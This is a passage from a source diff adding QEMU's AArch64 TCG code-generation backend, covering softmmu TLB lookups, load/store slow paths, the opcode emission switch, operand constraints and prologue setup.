*/ + if ((bh != 0) ^ sub) { + insn = I3503_SBC; + } + bh = TCG_REG_XZR; + } else if (sub) { + insn = I3503_SBC; + } + tcg_out_insn_3503(s, insn, ext, rh, ah, bh); + + tcg_out_mov(s, ext, orig_rl, rl); +} + +#ifdef CONFIG_SOFTMMU +/* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr, + * int mmu_idx, uintptr_t ra) + */ +static void * const qemu_ld_helpers[16] = { + [MO_UB] = helper_ret_ldub_mmu, + [MO_LEUW] = helper_le_lduw_mmu, + [MO_LEUL] = helper_le_ldul_mmu, + [MO_LEQ] = helper_le_ldq_mmu, + [MO_BEUW] = helper_be_lduw_mmu, + [MO_BEUL] = helper_be_ldul_mmu, + [MO_BEQ] = helper_be_ldq_mmu, +}; + +/* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr, + * uintxx_t val, int mmu_idx, uintptr_t ra) + */ +static void * const qemu_st_helpers[16] = { + [MO_UB] = helper_ret_stb_mmu, + [MO_LEUW] = helper_le_stw_mmu, + [MO_LEUL] = helper_le_stl_mmu, + [MO_LEQ] = helper_le_stq_mmu, + [MO_BEUW] = helper_be_stw_mmu, + [MO_BEUL] = helper_be_stl_mmu, + [MO_BEQ] = helper_be_stq_mmu, +}; + +static inline void tcg_out_adr(TCGContext *s, TCGReg rd, void *target) +{ + ptrdiff_t offset = tcg_pcrel_diff(s, target); + assert(offset == sextract64(offset, 0, 21)); + tcg_out_insn(s, 3406, ADR, rd, offset); +} + +static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) +{ + TCGMemOp opc = lb->opc; + TCGMemOp size = opc & MO_SIZE; + + reloc_pc19(lb->label_ptr[0], s->code_ptr); + + tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_X0, TCG_AREG0); + tcg_out_mov(s, TARGET_LONG_BITS == 64, TCG_REG_X1, lb->addrlo_reg); + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_X2, lb->mem_index); + tcg_out_adr(s, TCG_REG_X3, lb->raddr); + tcg_out_call(s, qemu_ld_helpers[opc & ~MO_SIGN]); + if (opc & MO_SIGN) { + tcg_out_sxt(s, lb->type, size, lb->datalo_reg, TCG_REG_X0); + } else { + tcg_out_mov(s, size == MO_64, lb->datalo_reg, TCG_REG_X0); + } + + tcg_out_goto(s, lb->raddr); +} + +static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) +{ + TCGMemOp opc 
= lb->opc; + TCGMemOp size = opc & MO_SIZE; + + reloc_pc19(lb->label_ptr[0], s->code_ptr); + + tcg_out_mov(s, TCG_TYPE_I64, TCG_REG_X0, TCG_AREG0); + tcg_out_mov(s, TARGET_LONG_BITS == 64, TCG_REG_X1, lb->addrlo_reg); + tcg_out_mov(s, size == MO_64, TCG_REG_X2, lb->datalo_reg); + tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_X3, lb->mem_index); + tcg_out_adr(s, TCG_REG_X4, lb->raddr); + tcg_out_call(s, qemu_st_helpers[opc]); + tcg_out_goto(s, lb->raddr); +} + +static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOp opc, + TCGType ext, TCGReg data_reg, TCGReg addr_reg, + int mem_index, tcg_insn_unit *raddr, + tcg_insn_unit *label_ptr) +{ + TCGLabelQemuLdst *label = new_ldst_label(s); + + label->is_ld = is_ld; + label->opc = opc; + label->type = ext; + label->datalo_reg = data_reg; + label->addrlo_reg = addr_reg; + label->mem_index = mem_index; + label->raddr = raddr; + label->label_ptr[0] = label_ptr; +} + +/* Load and compare a TLB entry, emitting the conditional jump to the + slow path for the failure case, which will be patched later when finalizing + the slow path. Generated code returns the host addend in X1, + clobbers X0,X2,X3,TMP. */ +static void tcg_out_tlb_read(TCGContext *s, TCGReg addr_reg, TCGMemOp s_bits, + tcg_insn_unit **label_ptr, int mem_index, + bool is_read) +{ + TCGReg base = TCG_AREG0; + int tlb_offset = is_read ? + offsetof(CPUArchState, tlb_table[mem_index][0].addr_read) + : offsetof(CPUArchState, tlb_table[mem_index][0].addr_write); + + /* Extract the TLB index from the address into X0. + X0 = + addr_reg */ + tcg_out_ubfm(s, TARGET_LONG_BITS == 64, TCG_REG_X0, addr_reg, + TARGET_PAGE_BITS, TARGET_PAGE_BITS + CPU_TLB_BITS); + + /* Store the page mask part of the address and the low s_bits into X3. + Later this allows checking for equality and alignment at the same time. 
+ X3 = addr_reg & (PAGE_MASK | ((1 << s_bits) - 1)) */ + tcg_out_logicali(s, I3404_ANDI, TARGET_LONG_BITS == 64, TCG_REG_X3, + addr_reg, TARGET_PAGE_MASK | ((1 << s_bits) - 1)); + + /* Add any "high bits" from the tlb offset to the env address into X2, + to take advantage of the LSL12 form of the ADDI instruction. + X2 = env + (tlb_offset & 0xfff000) */ + if (tlb_offset & 0xfff000) { + tcg_out_insn(s, 3401, ADDI, TCG_TYPE_I64, TCG_REG_X2, base, + tlb_offset & 0xfff000); + base = TCG_REG_X2; + } + + /* Merge the tlb index contribution into X2. + X2 = X2 + (X0 << CPU_TLB_ENTRY_BITS) */ + tcg_out_insn(s, 3502S, ADD_LSL, TCG_TYPE_I64, TCG_REG_X2, base, + TCG_REG_X0, CPU_TLB_ENTRY_BITS); + + /* Merge "low bits" from tlb offset, load the tlb comparator into X0. + X0 = load [X2 + (tlb_offset & 0x000fff)] */ + tcg_out_ldst(s, TARGET_LONG_BITS == 32 ? I3312_LDRW : I3312_LDRX, + TCG_REG_X0, TCG_REG_X2, tlb_offset & 0xfff); + + /* Load the tlb addend. Do that early to avoid stalling. + X1 = load [X2 + (tlb_offset & 0xfff) + offsetof(addend)] */ + tcg_out_ldst(s, I3312_LDRX, TCG_REG_X1, TCG_REG_X2, + (tlb_offset & 0xfff) + (offsetof(CPUTLBEntry, addend)) - + (is_read ? offsetof(CPUTLBEntry, addr_read) + : offsetof(CPUTLBEntry, addr_write))); + + /* Perform the address comparison. */ + tcg_out_cmp(s, (TARGET_LONG_BITS == 64), TCG_REG_X0, TCG_REG_X3, 0); + + /* If not equal, we jump to the slow path. */ + *label_ptr = s->code_ptr; + tcg_out_goto_cond_noaddr(s, TCG_COND_NE); +} + +#endif /* CONFIG_SOFTMMU */ + +static void tcg_out_qemu_ld_direct(TCGContext *s, TCGMemOp memop, TCGType ext, + TCGReg data_r, TCGReg addr_r, TCGReg off_r) +{ + const TCGMemOp bswap = memop & MO_BSWAP; + + switch (memop & MO_SSIZE) { + case MO_UB: + tcg_out_ldst_r(s, I3312_LDRB, data_r, addr_r, off_r); + break; + case MO_SB: + tcg_out_ldst_r(s, ext ? 
I3312_LDRSBX : I3312_LDRSBW, + data_r, addr_r, off_r); + break; + case MO_UW: + tcg_out_ldst_r(s, I3312_LDRH, data_r, addr_r, off_r); + if (bswap) { + tcg_out_rev16(s, data_r, data_r); + } + break; + case MO_SW: + if (bswap) { + tcg_out_ldst_r(s, I3312_LDRH, data_r, addr_r, off_r); + tcg_out_rev16(s, data_r, data_r); + tcg_out_sxt(s, ext, MO_16, data_r, data_r); + } else { + tcg_out_ldst_r(s, ext ? I3312_LDRSHX : I3312_LDRSHW, + data_r, addr_r, off_r); + } + break; + case MO_UL: + tcg_out_ldst_r(s, I3312_LDRW, data_r, addr_r, off_r); + if (bswap) { + tcg_out_rev32(s, data_r, data_r); + } + break; + case MO_SL: + if (bswap) { + tcg_out_ldst_r(s, I3312_LDRW, data_r, addr_r, off_r); + tcg_out_rev32(s, data_r, data_r); + tcg_out_sxt(s, TCG_TYPE_I64, MO_32, data_r, data_r); + } else { + tcg_out_ldst_r(s, I3312_LDRSWX, data_r, addr_r, off_r); + } + break; + case MO_Q: + tcg_out_ldst_r(s, I3312_LDRX, data_r, addr_r, off_r); + if (bswap) { + tcg_out_rev64(s, data_r, data_r); + } + break; + default: + tcg_abort(); + } +} + +static void tcg_out_qemu_st_direct(TCGContext *s, TCGMemOp memop, + TCGReg data_r, TCGReg addr_r, TCGReg off_r) +{ + const TCGMemOp bswap = memop & MO_BSWAP; + + switch (memop & MO_SIZE) { + case MO_8: + tcg_out_ldst_r(s, I3312_STRB, data_r, addr_r, off_r); + break; + case MO_16: + if (bswap && data_r != TCG_REG_XZR) { + tcg_out_rev16(s, TCG_REG_TMP, data_r); + data_r = TCG_REG_TMP; + } + tcg_out_ldst_r(s, I3312_STRH, data_r, addr_r, off_r); + break; + case MO_32: + if (bswap && data_r != TCG_REG_XZR) { + tcg_out_rev32(s, TCG_REG_TMP, data_r); + data_r = TCG_REG_TMP; + } + tcg_out_ldst_r(s, I3312_STRW, data_r, addr_r, off_r); + break; + case MO_64: + if (bswap && data_r != TCG_REG_XZR) { + tcg_out_rev64(s, TCG_REG_TMP, data_r); + data_r = TCG_REG_TMP; + } + tcg_out_ldst_r(s, I3312_STRX, data_r, addr_r, off_r); + break; + default: + tcg_abort(); + } +} + +static void tcg_out_qemu_ld(TCGContext *s, TCGReg data_reg, TCGReg addr_reg, + TCGMemOp memop, 
TCGType ext, int mem_index) +{ +#ifdef CONFIG_SOFTMMU + TCGMemOp s_bits = memop & MO_SIZE; + tcg_insn_unit *label_ptr; + + tcg_out_tlb_read(s, addr_reg, s_bits, &label_ptr, mem_index, 1); + tcg_out_qemu_ld_direct(s, memop, ext, data_reg, addr_reg, TCG_REG_X1); + add_qemu_ldst_label(s, true, memop, ext, data_reg, addr_reg, + mem_index, s->code_ptr, label_ptr); +#else /* !CONFIG_SOFTMMU */ + tcg_out_qemu_ld_direct(s, memop, ext, data_reg, addr_reg, + GUEST_BASE ? TCG_REG_GUEST_BASE : TCG_REG_XZR); +#endif /* CONFIG_SOFTMMU */ +} + +static void tcg_out_qemu_st(TCGContext *s, TCGReg data_reg, TCGReg addr_reg, + TCGMemOp memop, int mem_index) +{ +#ifdef CONFIG_SOFTMMU + TCGMemOp s_bits = memop & MO_SIZE; + tcg_insn_unit *label_ptr; + + tcg_out_tlb_read(s, addr_reg, s_bits, &label_ptr, mem_index, 0); + tcg_out_qemu_st_direct(s, memop, data_reg, addr_reg, TCG_REG_X1); + add_qemu_ldst_label(s, false, memop, s_bits == MO_64, data_reg, addr_reg, + mem_index, s->code_ptr, label_ptr); +#else /* !CONFIG_SOFTMMU */ + tcg_out_qemu_st_direct(s, memop, data_reg, addr_reg, + GUEST_BASE ? TCG_REG_GUEST_BASE : TCG_REG_XZR); +#endif /* CONFIG_SOFTMMU */ +} + +static tcg_insn_unit *tb_ret_addr; + +static void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg args[TCG_MAX_OP_ARGS], + const int const_args[TCG_MAX_OP_ARGS]) +{ + /* 99% of the time, we can signal the use of extension registers + by looking to see if the opcode handles 64-bit data. */ + TCGType ext = (s->tcg_op_defs[opc].flags & TCG_OPF_64BIT) != 0; + + /* Hoist the loads of the most common arguments. */ + TCGArg a0 = args[0]; + TCGArg a1 = args[1]; + TCGArg a2 = args[2]; + int c2 = const_args[2]; + + /* Some operands are defined with "rZ" constraint, a register or + the zero register. These need not actually test args[I] == 0. */ +#define REG0(I) (const_args[I] ? 
TCG_REG_XZR : (TCGReg)args[I]) + + switch (opc) { + case INDEX_op_exit_tb: + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_X0, a0); + tcg_out_goto(s, tb_ret_addr); + break; + + case INDEX_op_goto_tb: +#ifndef USE_DIRECT_JUMP +#error "USE_DIRECT_JUMP required for aarch64" +#endif + assert(s->tb_jmp_offset != NULL); /* consistency for USE_DIRECT_JUMP */ + s->tb_jmp_offset[a0] = tcg_current_code_size(s); + /* actual branch destination will be patched by + aarch64_tb_set_jmp_target later, beware retranslation. */ + tcg_out_goto_noaddr(s); + s->tb_next_offset[a0] = tcg_current_code_size(s); + break; + + case INDEX_op_br: + tcg_out_goto_label(s, a0); + break; + + case INDEX_op_ld8u_i32: + case INDEX_op_ld8u_i64: + tcg_out_ldst(s, I3312_LDRB, a0, a1, a2); + break; + case INDEX_op_ld8s_i32: + tcg_out_ldst(s, I3312_LDRSBW, a0, a1, a2); + break; + case INDEX_op_ld8s_i64: + tcg_out_ldst(s, I3312_LDRSBX, a0, a1, a2); + break; + case INDEX_op_ld16u_i32: + case INDEX_op_ld16u_i64: + tcg_out_ldst(s, I3312_LDRH, a0, a1, a2); + break; + case INDEX_op_ld16s_i32: + tcg_out_ldst(s, I3312_LDRSHW, a0, a1, a2); + break; + case INDEX_op_ld16s_i64: + tcg_out_ldst(s, I3312_LDRSHX, a0, a1, a2); + break; + case INDEX_op_ld_i32: + case INDEX_op_ld32u_i64: + tcg_out_ldst(s, I3312_LDRW, a0, a1, a2); + break; + case INDEX_op_ld32s_i64: + tcg_out_ldst(s, I3312_LDRSWX, a0, a1, a2); + break; + case INDEX_op_ld_i64: + tcg_out_ldst(s, I3312_LDRX, a0, a1, a2); + break; + + case INDEX_op_st8_i32: + case INDEX_op_st8_i64: + tcg_out_ldst(s, I3312_STRB, REG0(0), a1, a2); + break; + case INDEX_op_st16_i32: + case INDEX_op_st16_i64: + tcg_out_ldst(s, I3312_STRH, REG0(0), a1, a2); + break; + case INDEX_op_st_i32: + case INDEX_op_st32_i64: + tcg_out_ldst(s, I3312_STRW, REG0(0), a1, a2); + break; + case INDEX_op_st_i64: + tcg_out_ldst(s, I3312_STRX, REG0(0), a1, a2); + break; + + case INDEX_op_add_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_add_i64: + if (c2) { + tcg_out_addsubi(s, ext, a0, a1, a2); + } 
else { + tcg_out_insn(s, 3502, ADD, ext, a0, a1, a2); + } + break; + + case INDEX_op_sub_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_sub_i64: + if (c2) { + tcg_out_addsubi(s, ext, a0, a1, -a2); + } else { + tcg_out_insn(s, 3502, SUB, ext, a0, a1, a2); + } + break; + + case INDEX_op_neg_i64: + case INDEX_op_neg_i32: + tcg_out_insn(s, 3502, SUB, ext, a0, TCG_REG_XZR, a1); + break; + + case INDEX_op_and_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_and_i64: + if (c2) { + tcg_out_logicali(s, I3404_ANDI, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3510, AND, ext, a0, a1, a2); + } + break; + + case INDEX_op_andc_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_andc_i64: + if (c2) { + tcg_out_logicali(s, I3404_ANDI, ext, a0, a1, ~a2); + } else { + tcg_out_insn(s, 3510, BIC, ext, a0, a1, a2); + } + break; + + case INDEX_op_or_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_or_i64: + if (c2) { + tcg_out_logicali(s, I3404_ORRI, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3510, ORR, ext, a0, a1, a2); + } + break; + + case INDEX_op_orc_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_orc_i64: + if (c2) { + tcg_out_logicali(s, I3404_ORRI, ext, a0, a1, ~a2); + } else { + tcg_out_insn(s, 3510, ORN, ext, a0, a1, a2); + } + break; + + case INDEX_op_xor_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_xor_i64: + if (c2) { + tcg_out_logicali(s, I3404_EORI, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3510, EOR, ext, a0, a1, a2); + } + break; + + case INDEX_op_eqv_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_eqv_i64: + if (c2) { + tcg_out_logicali(s, I3404_EORI, ext, a0, a1, ~a2); + } else { + tcg_out_insn(s, 3510, EON, ext, a0, a1, a2); + } + break; + + case INDEX_op_not_i64: + case INDEX_op_not_i32: + tcg_out_insn(s, 3510, ORN, ext, a0, TCG_REG_XZR, a1); + break; + + case INDEX_op_mul_i64: + case INDEX_op_mul_i32: + tcg_out_insn(s, 3509, MADD, ext, a0, a1, a2, TCG_REG_XZR); + break; + + case 
INDEX_op_div_i64: + case INDEX_op_div_i32: + tcg_out_insn(s, 3508, SDIV, ext, a0, a1, a2); + break; + case INDEX_op_divu_i64: + case INDEX_op_divu_i32: + tcg_out_insn(s, 3508, UDIV, ext, a0, a1, a2); + break; + + case INDEX_op_rem_i64: + case INDEX_op_rem_i32: + tcg_out_insn(s, 3508, SDIV, ext, TCG_REG_TMP, a1, a2); + tcg_out_insn(s, 3509, MSUB, ext, a0, TCG_REG_TMP, a2, a1); + break; + case INDEX_op_remu_i64: + case INDEX_op_remu_i32: + tcg_out_insn(s, 3508, UDIV, ext, TCG_REG_TMP, a1, a2); + tcg_out_insn(s, 3509, MSUB, ext, a0, TCG_REG_TMP, a2, a1); + break; + + case INDEX_op_shl_i64: + case INDEX_op_shl_i32: + if (c2) { + tcg_out_shl(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3508, LSLV, ext, a0, a1, a2); + } + break; + + case INDEX_op_shr_i64: + case INDEX_op_shr_i32: + if (c2) { + tcg_out_shr(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3508, LSRV, ext, a0, a1, a2); + } + break; + + case INDEX_op_sar_i64: + case INDEX_op_sar_i32: + if (c2) { + tcg_out_sar(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3508, ASRV, ext, a0, a1, a2); + } + break; + + case INDEX_op_rotr_i64: + case INDEX_op_rotr_i32: + if (c2) { + tcg_out_rotr(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3508, RORV, ext, a0, a1, a2); + } + break; + + case INDEX_op_rotl_i64: + case INDEX_op_rotl_i32: + if (c2) { + tcg_out_rotl(s, ext, a0, a1, a2); + } else { + tcg_out_insn(s, 3502, SUB, 0, TCG_REG_TMP, TCG_REG_XZR, a2); + tcg_out_insn(s, 3508, RORV, ext, a0, a1, TCG_REG_TMP); + } + break; + + case INDEX_op_brcond_i32: + a1 = (int32_t)a1; + /* FALLTHRU */ + case INDEX_op_brcond_i64: + tcg_out_brcond(s, ext, a2, a0, a1, const_args[1], args[3]); + break; + + case INDEX_op_setcond_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_setcond_i64: + tcg_out_cmp(s, ext, a1, a2, c2); + /* Use CSET alias of CSINC Wd, WZR, WZR, invert(cond). 
*/ + tcg_out_insn(s, 3506, CSINC, TCG_TYPE_I32, a0, TCG_REG_XZR, + TCG_REG_XZR, tcg_invert_cond(args[3])); + break; + + case INDEX_op_movcond_i32: + a2 = (int32_t)a2; + /* FALLTHRU */ + case INDEX_op_movcond_i64: + tcg_out_cmp(s, ext, a1, a2, c2); + tcg_out_insn(s, 3506, CSEL, ext, a0, REG0(3), REG0(4), args[5]); + break; + + case INDEX_op_qemu_ld_i32: + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, a0, a1, a2, ext, args[3]); + break; + case INDEX_op_qemu_st_i32: + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, REG0(0), a1, a2, args[3]); + break; + + case INDEX_op_bswap64_i64: + tcg_out_rev64(s, a0, a1); + break; + case INDEX_op_bswap32_i64: + case INDEX_op_bswap32_i32: + tcg_out_rev32(s, a0, a1); + break; + case INDEX_op_bswap16_i64: + case INDEX_op_bswap16_i32: + tcg_out_rev16(s, a0, a1); + break; + + case INDEX_op_ext8s_i64: + case INDEX_op_ext8s_i32: + tcg_out_sxt(s, ext, MO_8, a0, a1); + break; + case INDEX_op_ext16s_i64: + case INDEX_op_ext16s_i32: + tcg_out_sxt(s, ext, MO_16, a0, a1); + break; + case INDEX_op_ext32s_i64: + tcg_out_sxt(s, TCG_TYPE_I64, MO_32, a0, a1); + break; + case INDEX_op_ext8u_i64: + case INDEX_op_ext8u_i32: + tcg_out_uxt(s, MO_8, a0, a1); + break; + case INDEX_op_ext16u_i64: + case INDEX_op_ext16u_i32: + tcg_out_uxt(s, MO_16, a0, a1); + break; + case INDEX_op_ext32u_i64: + tcg_out_movr(s, TCG_TYPE_I32, a0, a1); + break; + + case INDEX_op_deposit_i64: + case INDEX_op_deposit_i32: + tcg_out_dep(s, ext, a0, REG0(2), args[3], args[4]); + break; + + case INDEX_op_add2_i32: + tcg_out_addsub2(s, TCG_TYPE_I32, a0, a1, REG0(2), REG0(3), + (int32_t)args[4], args[5], const_args[4], + const_args[5], false); + break; + case INDEX_op_add2_i64: + tcg_out_addsub2(s, TCG_TYPE_I64, a0, a1, REG0(2), REG0(3), args[4], + args[5], const_args[4], const_args[5], false); + break; + case INDEX_op_sub2_i32: + tcg_out_addsub2(s, TCG_TYPE_I32, a0, a1, REG0(2), REG0(3), + (int32_t)args[4], args[5], const_args[4], + const_args[5], true); + break; + case 
INDEX_op_sub2_i64: + tcg_out_addsub2(s, TCG_TYPE_I64, a0, a1, REG0(2), REG0(3), args[4], + args[5], const_args[4], const_args[5], true); + break; + + case INDEX_op_muluh_i64: + tcg_out_insn(s, 3508, UMULH, TCG_TYPE_I64, a0, a1, a2); + break; + case INDEX_op_mulsh_i64: + tcg_out_insn(s, 3508, SMULH, TCG_TYPE_I64, a0, a1, a2); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } + +#undef REG0 +} + +static const TCGTargetOpDef aarch64_op_defs[] = { + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + { INDEX_op_br, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_ld8u_i64, { "r", "r" } }, + { INDEX_op_ld8s_i64, { "r", "r" } }, + { INDEX_op_ld16u_i64, { "r", "r" } }, + { INDEX_op_ld16s_i64, { "r", "r" } }, + { INDEX_op_ld32u_i64, { "r", "r" } }, + { INDEX_op_ld32s_i64, { "r", "r" } }, + { INDEX_op_ld_i64, { "r", "r" } }, + + { INDEX_op_st8_i32, { "rZ", "r" } }, + { INDEX_op_st16_i32, { "rZ", "r" } }, + { INDEX_op_st_i32, { "rZ", "r" } }, + { INDEX_op_st8_i64, { "rZ", "r" } }, + { INDEX_op_st16_i64, { "rZ", "r" } }, + { INDEX_op_st32_i64, { "rZ", "r" } }, + { INDEX_op_st_i64, { "rZ", "r" } }, + + { INDEX_op_add_i32, { "r", "r", "rA" } }, + { INDEX_op_add_i64, { "r", "r", "rA" } }, + { INDEX_op_sub_i32, { "r", "r", "rA" } }, + { INDEX_op_sub_i64, { "r", "r", "rA" } }, + { INDEX_op_mul_i32, { "r", "r", "r" } }, + { INDEX_op_mul_i64, { "r", "r", "r" } }, + { INDEX_op_div_i32, { "r", "r", "r" } }, + { INDEX_op_div_i64, { "r", "r", "r" } }, + { INDEX_op_divu_i32, { "r", "r", "r" } }, + { INDEX_op_divu_i64, { "r", "r", "r" } }, + { INDEX_op_rem_i32, { "r", "r", "r" } }, + { 
INDEX_op_rem_i64, { "r", "r", "r" } }, + { INDEX_op_remu_i32, { "r", "r", "r" } }, + { INDEX_op_remu_i64, { "r", "r", "r" } }, + { INDEX_op_and_i32, { "r", "r", "rL" } }, + { INDEX_op_and_i64, { "r", "r", "rL" } }, + { INDEX_op_or_i32, { "r", "r", "rL" } }, + { INDEX_op_or_i64, { "r", "r", "rL" } }, + { INDEX_op_xor_i32, { "r", "r", "rL" } }, + { INDEX_op_xor_i64, { "r", "r", "rL" } }, + { INDEX_op_andc_i32, { "r", "r", "rL" } }, + { INDEX_op_andc_i64, { "r", "r", "rL" } }, + { INDEX_op_orc_i32, { "r", "r", "rL" } }, + { INDEX_op_orc_i64, { "r", "r", "rL" } }, + { INDEX_op_eqv_i32, { "r", "r", "rL" } }, + { INDEX_op_eqv_i64, { "r", "r", "rL" } }, + + { INDEX_op_neg_i32, { "r", "r" } }, + { INDEX_op_neg_i64, { "r", "r" } }, + { INDEX_op_not_i32, { "r", "r" } }, + { INDEX_op_not_i64, { "r", "r" } }, + + { INDEX_op_shl_i32, { "r", "r", "ri" } }, + { INDEX_op_shr_i32, { "r", "r", "ri" } }, + { INDEX_op_sar_i32, { "r", "r", "ri" } }, + { INDEX_op_rotl_i32, { "r", "r", "ri" } }, + { INDEX_op_rotr_i32, { "r", "r", "ri" } }, + { INDEX_op_shl_i64, { "r", "r", "ri" } }, + { INDEX_op_shr_i64, { "r", "r", "ri" } }, + { INDEX_op_sar_i64, { "r", "r", "ri" } }, + { INDEX_op_rotl_i64, { "r", "r", "ri" } }, + { INDEX_op_rotr_i64, { "r", "r", "ri" } }, + + { INDEX_op_brcond_i32, { "r", "rA" } }, + { INDEX_op_brcond_i64, { "r", "rA" } }, + { INDEX_op_setcond_i32, { "r", "r", "rA" } }, + { INDEX_op_setcond_i64, { "r", "r", "rA" } }, + { INDEX_op_movcond_i32, { "r", "r", "rA", "rZ", "rZ" } }, + { INDEX_op_movcond_i64, { "r", "r", "rA", "rZ", "rZ" } }, + + { INDEX_op_qemu_ld_i32, { "r", "l" } }, + { INDEX_op_qemu_ld_i64, { "r", "l" } }, + { INDEX_op_qemu_st_i32, { "lZ", "l" } }, + { INDEX_op_qemu_st_i64, { "lZ", "l" } }, + + { INDEX_op_bswap16_i32, { "r", "r" } }, + { INDEX_op_bswap32_i32, { "r", "r" } }, + { INDEX_op_bswap16_i64, { "r", "r" } }, + { INDEX_op_bswap32_i64, { "r", "r" } }, + { INDEX_op_bswap64_i64, { "r", "r" } }, + + { INDEX_op_ext8s_i32, { "r", "r" } }, + { 
INDEX_op_ext16s_i32, { "r", "r" } }, + { INDEX_op_ext8u_i32, { "r", "r" } }, + { INDEX_op_ext16u_i32, { "r", "r" } }, + + { INDEX_op_ext8s_i64, { "r", "r" } }, + { INDEX_op_ext16s_i64, { "r", "r" } }, + { INDEX_op_ext32s_i64, { "r", "r" } }, + { INDEX_op_ext8u_i64, { "r", "r" } }, + { INDEX_op_ext16u_i64, { "r", "r" } }, + { INDEX_op_ext32u_i64, { "r", "r" } }, + + { INDEX_op_deposit_i32, { "r", "0", "rZ" } }, + { INDEX_op_deposit_i64, { "r", "0", "rZ" } }, + + { INDEX_op_add2_i32, { "r", "r", "rZ", "rZ", "rA", "rMZ" } }, + { INDEX_op_add2_i64, { "r", "r", "rZ", "rZ", "rA", "rMZ" } }, + { INDEX_op_sub2_i32, { "r", "r", "rZ", "rZ", "rA", "rMZ" } }, + { INDEX_op_sub2_i64, { "r", "r", "rZ", "rZ", "rA", "rMZ" } }, + + { INDEX_op_muluh_i64, { "r", "r", "r" } }, + { INDEX_op_mulsh_i64, { "r", "r", "r" } }, + + { -1 }, +}; + +static void tcg_target_init(TCGContext *s) +{ + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xffffffff); + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I64], 0, 0xffffffff); + + tcg_regset_set32(s->tcg_target_call_clobber_regs, 0, + (1 << TCG_REG_X0) | (1 << TCG_REG_X1) | + (1 << TCG_REG_X2) | (1 << TCG_REG_X3) | + (1 << TCG_REG_X4) | (1 << TCG_REG_X5) | + (1 << TCG_REG_X6) | (1 << TCG_REG_X7) | + (1 << TCG_REG_X8) | (1 << TCG_REG_X9) | + (1 << TCG_REG_X10) | (1 << TCG_REG_X11) | + (1 << TCG_REG_X12) | (1 << TCG_REG_X13) | + (1 << TCG_REG_X14) | (1 << TCG_REG_X15) | + (1 << TCG_REG_X16) | (1 << TCG_REG_X17) | + (1 << TCG_REG_X18) | (1 << TCG_REG_X30)); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_SP); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_FP); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_X18); /* platform register */ + + tcg_add_target_add_op_defs(s, aarch64_op_defs); +} + +/* Saving pairs: (X19, X20) .. (X27, X28), (X29(fp), X30(lr)). 
*/ +#define PUSH_SIZE ((30 - 19 + 1) * 8) + +#define FRAME_SIZE \ + ((PUSH_SIZE \ + + TCG_STATIC_CALL_ARGS_SIZE \ + + CPU_TEMP_BUF_NLONGS * sizeof(long) \ + + TCG_TARGET_STACK_ALIGN - 1) \ + & ~(TCG_TARGET_STACK_ALIGN - 1)) + +/* We're expecting a 2 byte uleb128 encoded value. */ +QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); + +/* We're expecting to use a single ADDI insn. */ +QEMU_BUILD_BUG_ON(FRAME_SIZE - PUSH_SIZE > 0xfff); + +static void tcg_target_qemu_prologue(TCGContext *s) +{ + TCGReg r; + + /* Push (FP, LR) and allocate space for all saved registers. */ + tcg_out_insn(s, 3314, STP, TCG_REG_FP, TCG_REG_LR, + TCG_REG_SP, -PUSH_SIZE, 1, 1); + + /* Set up frame pointer for canonical unwinding. */ + tcg_out_movr_sp(s, TCG_TYPE_I64, TCG_REG_FP, TCG_REG_SP); + + /* Store callee-preserved regs x19..x28. */ + for (r = TCG_REG_X19; r <= TCG_REG_X27; r += 2) { + int ofs = (r - TCG_REG_X19 + 2) * 8; + tcg_out_insn(s, 3314, STP, r, r + 1, TCG_REG_SP, ofs, 1, 0); + } + + /* Make stack space for TCG locals. */ + tcg_out_insn(s, 3401, SUBI, TCG_TYPE_I64, TCG_REG_SP, TCG_REG_SP, + FRAME_SIZE - PUSH_SIZE); + + /* Inform TCG about how to find TCG locals with register, offset, size. */ + 